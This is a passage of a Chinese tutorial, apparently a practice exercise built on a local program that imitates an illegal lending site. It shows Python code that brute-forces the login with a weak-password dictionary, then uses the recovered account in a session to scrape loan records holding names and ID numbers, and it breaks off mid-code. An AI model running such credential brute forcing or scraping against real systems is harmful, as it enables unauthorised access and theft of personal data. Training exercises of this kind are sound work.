前两天在网上看到了一个很有趣的项目
就是利用Python 爬虫,取证某非法网贷系统的数据!
🔴运行程序:windows系统双击运行web.exe【弹出防火墙允许访问】,linux或mac运行./web
🔴目标地址:*****//*******:8888/
🔴隐藏提示:分析网页代码找到加密规则
我们需要实现的步骤:
第一步: 编写python程序爆破该系统的账号密码并记录
第二步: 编写python程序绕过反爬限制自动登录系统
第三步: 爬取放贷人员和放贷记录分别保存到【放贷人员.csv】和【放贷记录.csV】文件中
第四步: 清洗放贷人员和放贷记录数据并关联二者关系,按照表头【姓名/身份证/放贷次数/放贷金额】按放贷金额从大到小排序保存到【放贷人员对应的放贷记录证据清单.cs】文件中
首先我们利用一些技术进入网站的后台,拿出大佬给的程序
打开web.exe
只有这样才能打开目标网页
最后爬取的url是:*****//*******:8888/
打开网页直接就是登录,打开F12登录一次试试,看看密码有没有加密
密码随便写的,只为了抓个包
用上面抓到的包发送请求,找到真的账号密码
import requests
url = '*****//*******:8888/login'
#抓包得到的url
headers={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.9 Safari/537.36'
}
#自己ua,最简单的设置
with open('账号密码弱口令字典.txt','r',encoding='utf-8')as f:
#读取密码本
for line in f:
a = line.strip('\n').split(' ')
#去除每行最后的换行符,账号密码中间和有一个空格,用空格切割得到一个列表
#列表里两个元素,就是账号和密码
username = a[0]
password = a[1]
params = {"username": username, "password": password}
#设置参数
r = requests.post(url=url, headers=headers, json=params).json()
#发送请求
print(username,password,r)
#打印账号密码和返回内容
得到的结果显示indigo是账号,playhouse是密码,登录进去
里面两个列表就是要爬取的内容,发现url后面带了个后缀
跟抓到的包正好对上了,开始写代码
import requests
#导入包
url = '*****//*******:8888/login'
#登录的url,为了保存cookies
headers={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.9 Safari/537.36'
}
#ua设置
params={"username":"indigo","password":"playhouse"}
#账号密码参数
session = requests.session()
#requests里的一个函数吧 不知道叫什么
#可以保存cookies,方便后面访问
r = session.post(url=url,headers=headers,json=params).json()
#获取cookies
agent_url = '*****//**